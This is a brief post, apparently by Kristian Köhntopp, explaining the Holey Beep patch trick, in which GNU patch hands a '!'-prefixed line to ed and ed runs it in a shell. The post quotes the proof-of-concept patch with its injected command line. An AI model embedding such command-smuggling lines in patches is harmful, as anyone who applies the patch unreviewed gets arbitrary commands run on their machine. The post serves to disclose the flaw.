The https://holeybeep.ninja/ website contains a patch https://holeybeep.ninja/beep.patch.
The patch contains a line starting with a !. That’s the actual bug, and it’s in the patch program. http://git.savannah.gnu.org/cgit/patch.git/tree/src/pch.c#n2383 --- /dev/null 2018-13-37 13:37:37.000000000 +0100 +++ b/beep.c 2018-13-37 13:38:38.000000000 +0100 1337a 1,112d !id>~/pwn.lol;beep # 13-21 12:53:21.000000000 +0100 . -- https://holeybeep.ninja/beep.patch patch calls ed. Ed calls sh. Arbitrary command execution through unreviewed patches. Does git call patch or implement patch-parsing by itself? K -- Kristian Köhntopp http://google.com/+KristianKohntopp
